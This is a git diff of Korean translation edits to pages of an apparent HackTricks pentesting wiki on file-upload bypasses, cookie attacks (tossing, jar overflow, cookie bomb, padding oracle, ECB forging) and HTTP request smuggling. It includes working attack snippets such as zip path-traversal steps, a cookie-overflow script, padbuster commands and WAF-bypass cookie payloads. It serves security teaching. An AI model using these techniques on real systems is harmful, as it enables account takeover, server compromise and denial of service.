+**리눅스**에서 **파일 이름**의 **최대** 길이는 **255**자이지만, **wget**은 파일 이름을 **236**자로 잘라냅니다. **"A"\*232+".php"+".gif"**라는 파일을 **다운로드**할 수 있으며, 이 파일 이름은 **검사**를 **우회**합니다(이 예에서 **".gif"**는 **유효한** 확장자입니다) 하지만 `wget`은 파일 이름을 **"A"\*232+".php"**로 **변경**합니다.
 ```bash
 #Create file and HTTP server
 echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
@@ -173,9 +99,9 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[=============================================
 - [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)에서 **다양한 svg 페이로드**를 시도해 보세요.
 - [유명한 **ImageTrick** 취약점](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/)
 - **웹 서버에 URL에서 이미지를 가져오도록 지시할 수 있다면**, [SSRF](../ssrf-server-side-request-forgery/)를 악용할 수 있습니다. 이 **이미지**가 어떤 **공개** 사이트에 **저장**될 경우, [https://iplogger.org/invisible/](https://iplogger.org/invisible/)의 URL을 지정하여 **모든 방문자의 정보를 훔칠** 수 있습니다.
-- [PDF-Adobe 업로드를 통한 **XXE 및 CORS** 우회](pdf-upload-xxe-and-cors-bypass.md)
+- [PDF-Adobe 업로드로 **XXE 및 CORS** 우회](pdf-upload-xxe-and-cors-bypass.md)
 - XSS를 위한 특별히 제작된 PDF: [다음 페이지는 **PDF 데이터를 주입하여 JS 실행을 얻는 방법**을 제시합니다](../xss-cross-site-scripting/pdf-injection.md). PDF를 업로드할 수 있다면, 주어진 지침에 따라 임의의 JS를 실행할 PDF를 준비할 수 있습니다.
-- \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) 내용을 업로드하여 서버에 **안티바이러스**가 있는지 확인합니다.
+- \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) 콘텐츠를 업로드하여 서버에 **안티바이러스**가 있는지 확인합니다.
 - 파일 업로드 시 **크기 제한**이 있는지 확인합니다.
 
 여기 파일 업로드를 통해 달성할 수 있는 10가지 목록이 있습니다 (출처: [여기](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
@@ -245,7 +171,7 @@ zip.close()
 
 create_zip()
 ```
-**압축을 이용한 파일 스프레이**
+**압축을 악용한 파일 스프레이**
 
 자세한 내용은 **원본 게시물을 확인하세요**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
 
@@ -266,7 +192,7 @@ root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php
 root@s2crew:/tmp# zip cmd.zip xx*.php
 ```
 
-3.  **Hex 편집기 또는 vi로 수정**: zip 내부의 파일 이름을 vi 또는 hex 편집기를 사용하여 "xxA"를 "../"로 변경하여 디렉토리를 탐색합니다.
+3.  **Hex 편집기 또는 vi로 수정**: zip 내부의 파일 이름을 vi 또는 hex 편집기를 사용하여 변경하여 "xxA"를 "../"로 변경하여 디렉토리를 탐색합니다.
 
 ```bash
 :set modifiable
@@ -293,11 +219,11 @@ PNG 파일의 IDAT 청크에 PHP 셸을 삽입하면 특정 이미지 처리 작
 
 ## 폴리글롯 파일
 
-폴리글롯 파일은 사이버 보안에서 독특한 도구로 작용하며, 여러 파일 형식에서 동시에 유효하게 존재할 수 있는 카멜레온과 같습니다. 흥미로운 예로는 [GIFAR](https://en.wikipedia.org/wiki/Gifar)가 있으며, 이는 GIF와 RAR 아카이브로서 기능하는 하이브리드입니다. 이러한 파일은 이 조합에 국한되지 않으며, GIF와 JS 또는 PPT와 JS와 같은 조합도 가능합니다.
+폴리글롯 파일은 사이버 보안에서 독특한 도구로 작용하며, 여러 파일 형식에서 동시에 유효하게 존재할 수 있는 카멜레온과 같습니다. 흥미로운 예로는 GIF와 RAR 아카이브로 기능하는 하이브리드인 [GIFAR](https://en.wikipedia.org/wiki/Gifar)가 있습니다. 이러한 파일은 이 조합에 국한되지 않으며, GIF와 JS 또는 PPT와 JS와 같은 조합도 가능합니다.
 
 폴리글롯 파일의 핵심 유용성은 파일 유형에 따라 파일을 검사하는 보안 조치를 우회할 수 있는 능력에 있습니다. 다양한 애플리케이션에서 일반적인 관행은 JPEG, GIF 또는 DOC와 같은 특정 파일 유형만 업로드를 허용하여 잠재적으로 해로운 형식(예: JS, PHP 또는 Phar 파일)으로 인한 위험을 완화하는 것입니다. 그러나 폴리글롯은 여러 파일 유형의 구조적 기준을 준수함으로써 이러한 제한을 은밀하게 우회할 수 있습니다.
 
-그들의 적응성에도 불구하고, 폴리글롯은 한계에 직면합니다. 예를 들어, 폴리글롯이 PHAR 파일(PHp ARchive)과 JPEG를 동시에 포함할 수 있지만, 업로드의 성공 여부는 플랫폼의 파일 확장자 정책에 달려 있을 수 있습니다. 시스템이 허용되는 확장자에 대해 엄격하다면, 폴리글롯의 단순한 구조적 이중성만으로는 업로드를 보장할 수 없을 수 있습니다.
+그들의 적응성에도 불구하고, 폴리글롯은 한계에 직면합니다. 예를 들어, 폴리글롯이 PHAR 파일(PHp ARchive)과 JPEG를 동시에 포함할 수 있지만, 업로드의 성공 여부는 플랫폼의 파일 확장자 정책에 달려 있을 수 있습니다. 시스템이 허용되는 확장자에 대해 엄격하다면, 폴리글롯의 단순한 구조적 이중성만으로는 업로드를 보장할 수 없습니다.
 
 자세한 정보는: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
 
diff --git a/src/pentesting-web/hacking-with-cookies/README.md b/src/pentesting-web/hacking-with-cookies/README.md
index 0cab0f519..58a129131 100644
--- a/src/pentesting-web/hacking-with-cookies/README.md
+++ b/src/pentesting-web/hacking-with-cookies/README.md
@@ -35,14 +35,14 @@
 쿠키를 구성할 때 이러한 속성을 이해하면 다양한 시나리오에서 예상대로 동작하도록 보장할 수 있습니다.
 
 | **요청 유형** | **예제 코드**                   | **쿠키 전송 시** |
-| ---------------- | ---------------------------------- | --------------------- |
-| 링크             | \<a href="...">\</a>               | NotSet\*, Lax, None   |
-| 프리렌더        | \<link rel="prerender" href=".."/> | NotSet\*, Lax, None   |
-| 폼 GET         | \<form method="GET" action="...">  | NotSet\*, Lax, None   |
-| 폼 POST        | \<form method="POST" action="..."> | NotSet\*, None        |
-| iframe           | \<iframe src="...">\</iframe>      | NotSet\*, None        |
-| AJAX             | $.get("...")                       | NotSet\*, None        |
-| 이미지            | \<img src="...">                   | NetSet\*, None        |
+| -------------- | -------------------------------- | ----------------- |
+| 링크           | \<a href="...">\</a>            | NotSet\*, Lax, None   |
+| 프리렌더링     | \<link rel="prerender" href=".."/> | NotSet\*, Lax, None   |
+| 폼 GET        | \<form method="GET" action="...">  | NotSet\*, Lax, None   |
+| 폼 POST       | \<form method="POST" action="..."> | NotSet\*, None        |
+| iframe         | \<iframe src="...">\</iframe>      | NotSet\*, None        |
+| AJAX           | $.get("...")                     | NotSet\*, None        |
+| 이미지        | \<img src="...">                 | NetSet\*, None        |
 
 [Invicti](https://www.netsparker.com/blog/web-security/same-site-cookie-attribute-prevent-cross-site-request-forgery/)에서 가져온 표이며 약간 수정되었습니다.\
 _**SameSite**_ 속성이 있는 쿠키는 **CSRF 공격을 완화**합니다.
@@ -58,10 +58,10 @@ _**SameSite**_ 속성이 있는 쿠키는 **CSRF 공격을 완화**합니다.
 
 #### **우회 방법**
 
-- 페이지가 요청의 응답으로 쿠키를 **전송하는 경우** (예: **PHPinfo** 페이지), XSS를 악용하여 이 페이지에 요청을 보내고 응답에서 **쿠키를 훔칠 수 있습니다** (예제는 [여기](https://hackcommander.github.io/posts/2022/11/12/bypass-httponly-via-php-info-page/)에서 확인하세요).
+- 페이지가 요청의 응답으로 쿠키를 **전송하는 경우** (예: **PHPinfo** 페이지에서), XSS를 악용하여 이 페이지에 요청을 보내고 응답에서 **쿠키를 훔칠 수 있습니다** (예제는 [여기](https://hackcommander.github.io/posts/2022/11/12/bypass-httponly-via-php-info-page/)에서 확인하세요).
 - 서버의 응답으로 **TRACE** **HTTP** 요청을 사용하여 우회할 수 있습니다 (이 HTTP 메서드가 사용 가능한 경우). 이 기술은 **교차 사이트 추적**이라고 합니다.
 - 이 기술은 **현대 브라우저에서 JS로 TRACE 요청을 전송하는 것을 허용하지 않음으로써 방지됩니다**. 그러나 IE6.0 SP2에서 `TRACE` 대신 `\r\nTRACE`를 전송하는 등의 특정 소프트웨어에서 우회 방법이 발견되었습니다.
-- 또 다른 방법은 브라우저의 제로/데이 취약점을 악용하는 것입니다.
+- 또 다른 방법은 브라우저의 제로데이 취약점을 악용하는 것입니다.
 - 쿠키 항아리 오버플로우 공격을 수행하여 **HttpOnly 쿠키를 덮어쓸 수 있습니다**:
 
 {{#ref}}
@@ -89,7 +89,7 @@ cookie-jar-overflow.md
 
 ### 쿠키 덮어쓰기
 
-따라서 `__Host-` 접두사가 붙은 쿠키의 보호 중 하나는 하위 도메인에서 덮어쓰는 것을 방지하는 것입니다. 예를 들어 [**쿠키 토스 공격**](cookie-tossing.md)을 방지합니다. [**쿠키 크럼블: 웹 세션 무결성 취약점 공개**](https://www.youtube.com/watch?v=F_wAzF4a7Xg) ([**논문**](https://www.usenix.org/system/files/usenixsecurity23-squarcina.pdf))에서 하위 도메인에서 \_\_HOST- 접두사가 붙은 쿠키를 설정하는 것이 가능하다고 발표되었습니다. 파서를 속여서 예를 들어 시작 부분이나 끝 부분에 "="를 추가하는 방식입니다:
+따라서 `__Host-` 접두사가 붙은 쿠키의 보호 중 하나는 하위 도메인에서 덮어쓰는 것을 방지하는 것입니다. 예를 들어 [**쿠키 토스 공격**](cookie-tossing.md)을 방지합니다. [**쿠키 크럼블: 웹 세션 무결성 취약점 공개**](https://www.youtube.com/watch?v=F_wAzF4a7Xg) ([**논문**](https://www.usenix.org/system/files/usenixsecurity23-squarcina.pdf))에서 하위 도메인에서 __HOST- 접두사가 붙은 쿠키를 설정하는 것이 가능하다고 제시되었습니다. 파서를 속여서 예를 들어 시작이나 끝에 "="를 추가하는 방법입니다:
 
 <figure><img src="../../images/image (6) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
@@ -107,11 +107,11 @@ cookie-jar-overflow.md
 
 ### 세션 하이재킹
 
-이 공격은 사용자의 쿠키를 훔쳐 애플리케이션 내에서 해당 계정에 무단으로 접근하는 것입니다. 도난당한 쿠키를 사용하여 공격자는 합법적인 사용자를 가장할 수 있습니다.
+이 공격은 사용자의 쿠키를 훔쳐 애플리케이션 내에서 그들의 계정에 무단으로 접근하는 것입니다. 도난당한 쿠키를 사용하여 공격자는 합법적인 사용자를 가장할 수 있습니다.
 
 ### 세션 고정
 
-이 시나리오에서 공격자는 피해자를 특정 쿠키를 사용하여 로그인하도록 속입니다. 애플리케이션이 로그인 시 새로운 쿠키를 할당하지 않으면, 공격자는 원래 쿠키를 가지고 피해자를 가장할 수 있습니다. 이 기술은 피해자가 공격자가 제공한 쿠키로 로그인하는 데 의존합니다.
+이 시나리오에서 공격자는 피해자를 특정 쿠키를 사용하여 로그인하도록 속입니다. 애플리케이션이 로그인 시 새 쿠키를 할당하지 않으면, 원래 쿠키를 가진 공격자는 피해자를 가장할 수 있습니다. 이 기술은 피해자가 공격자가 제공한 쿠키로 로그인하는 데 의존합니다.
 
 하위 도메인에서 **XSS를 발견했거나** 하위 도메인을 **제어하는 경우**, 읽어보세요:
 
@@ -121,7 +121,7 @@ cookie-tossing.md
 
 ### 세션 기부
 
-여기서 공격자는 피해자가 공격자의 세션 쿠키를 사용하도록 설득합니다. 피해자는 자신의 계정에 로그인했다고 믿고 공격자의 계정 컨텍스트에서 무심코 작업을 수행하게 됩니다.
+여기서 공격자는 피해자가 공격자의 세션 쿠키를 사용하도록 설득합니다. 피해자는 자신의 계정에 로그인했다고 믿고 공격자의 계정 컨텍스트에서 무의식적으로 작업을 수행하게 됩니다.
 
 하위 도메인에서 **XSS를 발견했거나** 하위 도메인을 **제어하는 경우**, 읽어보세요:
 
@@ -137,7 +137,7 @@ cookie-tossing.md
 
 ### 교차 사이트 요청 위조 (CSRF)
 
-이 공격은 로그인된 사용자가 현재 인증된 웹 애플리케이션에서 원치 않는 작업을 수행하도록 강요합니다. 공격자는 취약한 사이트에 대한 모든 요청과 함께 자동으로 전송되는 쿠키를 악용할 수 있습니다.
+이 공격은 로그인된 사용자가 현재 인증된 웹 애플리케이션에서 원하지 않는 작업을 수행하도록 강요합니다. 공격자는 취약한 사이트에 대한 모든 요청과 함께 자동으로 전송되는 쿠키를 악용할 수 있습니다.
 
 ### 빈 쿠키
 
@@ -167,7 +167,7 @@ document.cookie = "\ud800=meep"
 
 #### 파싱 문제로 인한 쿠키 스머글링
 
-(자세한 내용은 [원본 연구](https://blog.ankursundara.com/cookie-bugs/)를 참조하십시오) Java(Jetty, TomCat, Undertow) 및 Python(Zope, cherrypy, web.py, aiohttp, bottle, webob)에서 제공하는 여러 웹 서버는 구식 RFC2965 지원으로 인해 쿠키 문자열을 잘못 처리합니다. 이들은 세미콜론이 포함되어 있어도 이중 인용된 쿠키 값을 단일 값으로 읽으며, 세미콜론은 일반적으로 키-값 쌍을 구분해야 합니다.
+(자세한 내용은 [원본 연구](https://blog.ankursundara.com/cookie-bugs/)를 참조하세요) Java(Jetty, TomCat, Undertow) 및 Python(Zope, cherrypy, web.py, aiohttp, bottle, webob)에서 제공하는 여러 웹 서버는 구식 RFC2965 지원으로 인해 쿠키 문자열을 잘못 처리합니다. 이들은 세미콜론이 포함되어 있어도 이중 인용된 쿠키 값을 단일 값으로 읽으며, 세미콜론은 일반적으로 키-값 쌍을 구분해야 합니다.
 ```
 RENDER_TEXT="hello world; JSESSIONID=13371337; ASDF=end";
 ```
@@ -183,11 +183,11 @@ RENDER_TEXT="hello world; JSESSIONID=13371337; ASDF=end";
 
 ### 쿠키 $version 및 WAF 우회
 
-[**이 블로그 게시물**](https://portswigger.net/research/bypassing-wafs-with-the-phantom-version-cookie)에 따르면, 쿠키 속성 **`$Version=1`**을 사용하여 백엔드가 쿠키를 파싱하는 데 오래된 논리를 사용할 수 있을 가능성이 있습니다. **RFC2109**에 따라, **`$Domain`** 및 **`$Path`**와 같은 다른 값도 쿠키와 함께 백엔드의 동작을 수정하는 데 사용될 수 있습니다.
+[**이 블로그 게시물**](https://portswigger.net/research/bypassing-wafs-with-the-phantom-version-cookie)에 따르면, **`$Version=1`** 쿠키 속성을 사용하여 백엔드가 쿠키를 파싱하는 오래된 논리를 사용할 수 있을지도 모릅니다. 이는 **RFC2109** 때문입니다. 또한 **`$Domain`** 및 **`$Path`**와 같은 다른 값을 사용하여 쿠키와 함께 백엔드의 동작을 수정할 수 있습니다.
 
 #### 인용 문자열 인코딩을 통한 우회 값 분석
 
-이 파싱은 쿠키 내에서 이스케이프된 값을 언이스케이프하도록 지시하므로, "\a"는 "a"가 됩니다. 이는 WAF를 우회하는 데 유용할 수 있습니다:
+이 파싱은 쿠키 내부의 이스케이프된 값을 언이스케이프하도록 지시하므로, "\a"는 "a"가 됩니다. 이는 WAF를 우회하는 데 유용할 수 있습니다:
 
 - `eval('test') => forbidden`
 - `"\e\v\a\l\(\'\t\e\s\t\'\)" => allowed`
@@ -205,7 +205,7 @@ Host: example.com
 Cookie: param1=value1;
 Cookie: param2=value2;
 ```
-이 예제와 같이 WAF를 우회할 수 있게 해줄 수 있습니다:
+이 예제와 같이 WAF를 우회할 수 있습니다:
 ```
 Cookie: name=eval('test//
 Cookie: comment')
@@ -218,10 +218,10 @@ Resulting cookie: name=eval('test//, comment') => allowed
 
 - **쿠키**가 매번 **로그인**할 때 **같은** 경우입니다.
 - 로그아웃하고 같은 쿠키를 사용해 보세요.
-- 두 개의 장치(또는 브라우저)로 같은 계정에 같은 쿠키로 로그인해 보세요.
+- 두 개의 장치(또는 브라우저)로 같은 계정에 같은 쿠키를 사용하여 로그인해 보세요.
 - 쿠키에 정보가 있는지 확인하고 수정해 보세요.
 - 거의 같은 사용자 이름으로 여러 계정을 생성하고 유사성을 확인해 보세요.
-- "**기억하기**" 옵션이 있는지 확인하고 어떻게 작동하는지 살펴보세요. 존재하고 취약할 수 있다면, 다른 쿠키 없이 항상 **기억하기** 쿠키를 사용하세요.
+- "**기억하기**" 옵션이 존재하는지 확인하여 어떻게 작동하는지 살펴보세요. 존재하고 취약할 수 있다면, 다른 쿠키 없이 항상 **기억하기** 쿠키를 사용하세요.
 - 비밀번호를 변경한 후에도 이전 쿠키가 작동하는지 확인하세요.
 
 #### **고급 쿠키 공격**
@@ -229,7 +229,7 @@ Resulting cookie: name=eval('test//, comment') => allowed
 로그인할 때 쿠키가 동일하게 유지되거나 거의 동일하다면, 이는 쿠키가 귀하의 계정의 일부 필드(아마도 사용자 이름)와 관련이 있음을 의미합니다. 그러면 다음을 시도할 수 있습니다:
 
 - 매우 **유사한** 사용자 이름으로 많은 **계정**을 생성하고 알고리즘이 어떻게 작동하는지 **추측**해 보세요.
-- **사용자 이름을 브루트포스**해 보세요. 쿠키가 사용자 이름에 대한 인증 방법으로만 저장된다면, 사용자 이름 "**Bmin**"으로 계정을 생성하고 쿠키의 모든 **비트**를 **브루트포스**할 수 있습니다. 왜냐하면 시도할 쿠키 중 하나는 "**admin**"에 속하는 쿠키일 것이기 때문입니다.
+- **사용자 이름을 브루트포스**해 보세요. 쿠키가 사용자 이름에 대한 인증 방법으로만 저장된다면, 사용자 이름 "**Bmin**"으로 계정을 생성하고 쿠키의 모든 **비트**를 **브루트포스**할 수 있습니다. 시도할 쿠키 중 하나는 "**admin**"에 속하는 쿠키가 될 것입니다.
 - **패딩** **오라클**을 시도해 보세요(쿠키의 내용을 복호화할 수 있습니다). **패드버스터**를 사용하세요.
 
 **패딩 오라클 - 패드버스터 예제**
@@ -242,7 +242,7 @@ padbuster http://web.com/index.php u7bvLewln6PJPSAbMb5pFfnCHSEd6olf 8 -cookies a
 padBuster http://web.com/home.jsp?UID=7B216A634951170FF851D6CC68FC9537858795A28ED4AAC6
 7B216A634951170FF851D6CC68FC9537858795A28ED4AAC6 8 -encoding 2
 ```
-Padbuster는 여러 번 시도하며 어떤 조건이 오류 조건인지(유효하지 않은 조건) 물어봅니다.
+Padbuster는 여러 번 시도하며 어떤 조건이 오류 조건(유효하지 않은 조건)인지 물어봅니다.
 
 그런 다음 쿠키를 해독하기 시작합니다(몇 분이 걸릴 수 있습니다).
 
@@ -271,9 +271,9 @@ padbuster http://web.com/index.php 1dMjA5hfXh0jenxJQ0iW6QXKkzAGIWsiDAKV3UwJPT2lB
 
 거의 동일한 데이터(사용자 이름, 비밀번호, 이메일 등)를 가진 2명의 사용자를 생성하고 주어진 쿠키 내에서 어떤 패턴을 발견하려고 시도합니다.
 
-예를 들어 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"라는 사용자를 생성하고 쿠키에서 패턴이 있는지 확인합니다(ECB는 동일한 키로 모든 블록을 암호화하므로 사용자 이름이 암호화되면 동일한 암호화된 바이트가 나타날 수 있습니다).
+예를 들어 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"라는 사용자를 생성하고 쿠키에서 패턴이 있는지 확인합니다(ECB는 매 블록마다 동일한 키로 암호화하므로 사용자 이름이 암호화되면 동일한 암호화된 바이트가 나타날 수 있습니다).
 
-사용된 블록의 크기로 패턴이 있어야 합니다. 따라서 "a"의 암호화된 묶음을 알고 있으면 사용자 이름을 생성할 수 있습니다: "a"\*(블록의 크기)+"admin". 그런 다음 쿠키에서 "a" 블록의 암호화된 패턴을 삭제할 수 있습니다. 그러면 사용자 이름 "admin"의 쿠키를 얻게 됩니다.
+사용된 블록의 크기만큼 "a"가 암호화된 방식에 대한 패턴이 있어야 합니다. 따라서 "a"\*(블록의 크기)+"admin"이라는 사용자 이름을 생성할 수 있습니다. 그런 다음 쿠키에서 "a" 블록의 암호화된 패턴을 삭제할 수 있습니다. 그러면 사용자 이름 "admin"의 쿠키를 얻게 됩니다.
 
 ## References
 
diff --git a/src/pentesting-web/hacking-with-cookies/cookie-bomb.md b/src/pentesting-web/hacking-with-cookies/cookie-bomb.md
index 2d9118304..0a900f026 100644
--- a/src/pentesting-web/hacking-with-cookies/cookie-bomb.md
+++ b/src/pentesting-web/hacking-with-cookies/cookie-bomb.md
@@ -1,6 +1,6 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-**`Cookie bomb`**는 **사용자를 대상으로 도메인 및 그 하위 도메인에 많은 양의 큰 쿠키를 추가하는 것**을 포함합니다. 이 작업은 피해자가 **과도한 HTTP 요청**을 서버에 전송하게 하며, 이는 이후 **서버에 의해 거부됩니다**. 이로 인해 해당 도메인 및 그 하위 도메인 내의 특정 사용자에 대한 서비스 거부(DoS)가 발생하게 됩니다.
+**`Cookie bomb`**는 **사용자를 대상으로 도메인 및 그 하위 도메인에 많은 양의 큰 쿠키를 추가하는 것**을 포함합니다. 이 행동은 피해자가 **서버에 과도한 HTTP 요청을 전송하게** 하며, 이는 이후 **서버에 의해 거부됩니다**. 이로 인해 해당 도메인 및 그 하위 도메인 내의 사용자를 특정하여 서비스 거부(DoS)가 발생하게 됩니다.
 
 좋은 **예시**는 이 글에서 볼 수 있습니다: [https://hackerone.com/reports/57356](https://hackerone.com/reports/57356)
 
diff --git a/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md b/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
index 2804300d7..d4adbf9b0 100644
--- a/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
+++ b/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
@@ -1,6 +1,6 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-브라우저는 페이지에 저장할 수 있는 **쿠키의 수에 제한**이 있습니다. 따라서 어떤 이유로 **쿠키를 사라지게** 해야 하는 경우, **쿠키 항아리를 오버플로우**시킬 수 있습니다. 그러면 가장 오래된 쿠키가 삭제됩니다:
+브라우저는 페이지에 저장할 수 있는 **쿠키의 수에 제한**이 있습니다. 따라서 어떤 이유로 **쿠키를 사라지게** 해야 하는 경우, **쿠키 항아리를 오버플로우**하여 가장 오래된 쿠키가 삭제되도록 할 수 있습니다:
 ```javascript
 // Set many cookies
 for (let i = 0; i < 700; i++) {
@@ -12,7 +12,7 @@ for (let i = 0; i < 700; i++) {
 document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
 }
 ```
-타사 쿠키가 다른 도메인을 가리키는 경우 덮어쓰이지 않음을 유의하십시오.
+타사 쿠키가 다른 도메인을 가리키는 경우 덮어쓰이지 않음을 유의하세요.
 
 > [!CAUTION]
 > 이 공격은 **HttpOnly 쿠키를 덮어쓸 수 있습니다. 쿠키를 삭제한 다음 원하는 값으로 재설정할 수 있습니다**.
diff --git a/src/pentesting-web/hacking-with-cookies/cookie-tossing.md b/src/pentesting-web/hacking-with-cookies/cookie-tossing.md
index 9517c1b57..08d25a1fd 100644
--- a/src/pentesting-web/hacking-with-cookies/cookie-tossing.md
+++ b/src/pentesting-web/hacking-with-cookies/cookie-tossing.md
@@ -11,24 +11,24 @@
 > [!CAUTION]
 > 따라서, **공격자는 특정 쿠키를 도메인과 서브도메인에 설정할 수 있습니다. 예를 들어** `document.cookie="session=1234; Path=/app/login; domain=.example.com"`
 
-이것은 위험할 수 있으며, 공격자는 다음과 같은 작업을 수행할 수 있습니다:
+이는 위험할 수 있으며, 공격자는 다음과 같은 작업을 수행할 수 있습니다:
 
-- **피해자의 쿠키를 공격자의 계정에 고정**시켜 사용자가 이를 인지하지 못하면, **공격자의 계정에서 행동을 수행하게 됩니다**. 공격자는 흥미로운 정보를 얻을 수 있습니다(플랫폼에서 사용자의 검색 기록 확인, 피해자가 계정에 신용카드를 설정할 수 있음...)
-- **로그인 후 쿠키가 변경되지 않는 경우**, 공격자는 **쿠키를 고정(세션 고정)**시키고, 피해자가 로그인할 때까지 기다린 후 **그 쿠키를 사용하여 피해자로 로그인할 수 있습니다**.
+- **피해자의 쿠키를 공격자의 계정으로 고정**하여 사용자가 이를 인지하지 못하면, **공격자의 계정에서 행동을 수행하게 됩니다**. 공격자는 흥미로운 정보를 얻을 수 있습니다(플랫폼에서 사용자의 검색 기록 확인, 피해자가 계정에 신용카드를 설정할 수 있음...)
+- **로그인 후 쿠키가 변경되지 않는 경우**, 공격자는 **쿠키를 고정(세션 고정)**하고 피해자가 로그인할 때까지 기다린 후 **그 쿠키를 사용하여 피해자로 로그인할 수 있습니다**.
 - 때때로, 세션 쿠키가 변경되더라도 공격자는 이전 쿠키를 사용하고 새로운 쿠키도 받을 수 있습니다.
 - **쿠키가 초기 값을 설정하는 경우**(예: 플라스크에서 **쿠키**가 **세션의 CSRF 토큰**을 **설정**하고 이 값이 피해자가 로그인한 후에도 유지되는 경우), **공격자는 이 알려진 값을 설정한 후 이를 악용할 수 있습니다**(이 경우 공격자는 CSRF 토큰을 알고 있으므로 사용자가 CSRF 요청을 수행하게 만들 수 있습니다).
 - 값을 설정하는 것처럼, 공격자는 서버에서 생성된 인증되지 않은 쿠키를 얻고, 그로부터 CSRF 토큰을 얻어 사용할 수도 있습니다.
 
 ### 쿠키 순서
 
-브라우저가 **같은 이름의 두 쿠키를 수신하고** **같은 범위**(도메인, 서브도메인 및 경로)에 부분적으로 영향을 미치는 경우, **브라우저는 요청에 대해 두 쿠키의 값을 모두 보냅니다**.
+브라우저가 **같은 이름의 두 쿠키를 수신하고** **같은 범위(도메인, 서브도메인 및 경로)에 부분적으로 영향을 미치는 경우**, **브라우저는 요청에 대해 두 쿠키의 값을 모두 보냅니다**.
 
-누가 **가장 구체적인 경로**를 가지고 있는지 또는 어떤 것이 **가장 오래된 것인지**에 따라, 브라우저는 **먼저 쿠키의 값을 설정하고** 그 다음에 다른 쿠키의 값을 설정합니다. 예: `Cookie: iduser=MoreSpecificAndOldestCookie; iduser=LessSpecific;`
+가장 **구체적인 경로**를 가진 쿠키나 **가장 오래된 쿠키**에 따라, 브라우저는 **먼저 쿠키의 값을 설정**하고 그 다음에 다른 쿠키의 값을 설정합니다. 예: `Cookie: iduser=MoreSpecificAndOldestCookie; iduser=LessSpecific;`
 
 대부분의 **웹사이트는 첫 번째 값만 사용합니다**. 따라서 공격자가 쿠키를 설정하려면 다른 쿠키가 설정되기 전에 설정하는 것이 좋거나 더 구체적인 경로로 설정하는 것이 좋습니다.
 
 > [!WARNING]
-> 또한, **더 구체적인 경로에 쿠키를 설정할 수 있는 능력**은 매우 흥미롭습니다. 이는 **피해자가 악성 쿠키가 설정된 특정 경로를 제외하고 자신의 쿠키로 작업하게 만들 수 있습니다**.
+> 또한, **더 구체적인 경로에 쿠키를 설정할 수 있는 능력**은 매우 흥미롭습니다. 이는 **피해자가 악성 쿠키가 설정된 특정 경로를 제외한 자신의 쿠키로 작업하게 만들 수 있습니다**.
 
 ### 보호 우회
 
@@ -40,7 +40,7 @@
 cookie-jar-overflow.md
 {{#endref}}
 
-또 다른 유용한 **우회** 방법은 **쿠키의 이름을 URL 인코딩하는 것입니다**. 일부 보호는 요청에서 같은 이름의 두 쿠키를 확인하고, 서버는 쿠키의 이름을 디코딩합니다.
+또 다른 유용한 **우회 방법**은 **쿠키의 이름을 URL 인코딩하는 것입니다**. 일부 보호 방법은 요청에서 같은 이름의 두 쿠키를 확인하고, 서버는 쿠키의 이름을 디코딩합니다.
 
 ### 쿠키 폭탄
 
@@ -54,7 +54,7 @@ cookie-bomb.md
 
 #### **쿠키 이름에 접두사 `__Host` 사용**
 
-- 쿠키 이름에 이 접두사가 있는 경우, **Secure로 표시되고, 안전한 출처에서 전송되며, Domain 속성이 포함되지 않고, Path 속성이 /로 설정된 경우에만** Set-Cookie 지시문에서 **수락됩니다**.
+- 쿠키 이름에 이 접두사가 있으면, **Secure로 표시되고, 안전한 출처에서 전송되며, Domain 속성이 포함되지 않고, Path 속성이 /로 설정된 경우에만** Set-Cookie 지시문에서 **수락됩니다**.
 - **이것은 서브도메인이 쿠키를 최상위 도메인으로 강제 설정하는 것을 방지합니다. 이러한 쿠키는 "도메인 잠금"으로 간주될 수 있습니다.**
 
 ### 참고 문헌
@@ -62,6 +62,6 @@ cookie-bomb.md
 - [**@blueminimal**](https://twitter.com/blueminimal)
 - [**https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers**](https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers)
 - [**https://github.blog/2013-04-09-yummy-cookies-across-domains/**](https://github.blog/2013-04-09-yummy-cookies-across-domains/)
-- [**쿠키 부서지기: 웹 세션 무결성 취약점 드러내기**](https://www.youtube.com/watch?v=F_wAzF4a7Xg)
+- [**쿠키 부서짐: 웹 세션 무결성 취약점 드러내기**](https://www.youtube.com/watch?v=F_wAzF4a7Xg)
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/http-connection-request-smuggling.md b/src/pentesting-web/http-connection-request-smuggling.md
index 1cbe2c7b0..d481de53f 100644
--- a/src/pentesting-web/http-connection-request-smuggling.md
+++ b/src/pentesting-web/http-connection-request-smuggling.md
@@ -18,7 +18,7 @@ Host: [internal-host]
 ```
 ### First-request Routing
 
-일부 구성에서 프론트엔드 서버는 **첫 번째 요청의 Host 헤더**를 사용하여 해당 요청의 백엔드 라우팅을 결정하고, 이후 동일한 클라이언트 연결의 모든 요청을 동일한 백엔드 연결로 지속적으로 라우팅할 수 있습니다. 이는 다음과 같이 설명할 수 있습니다:
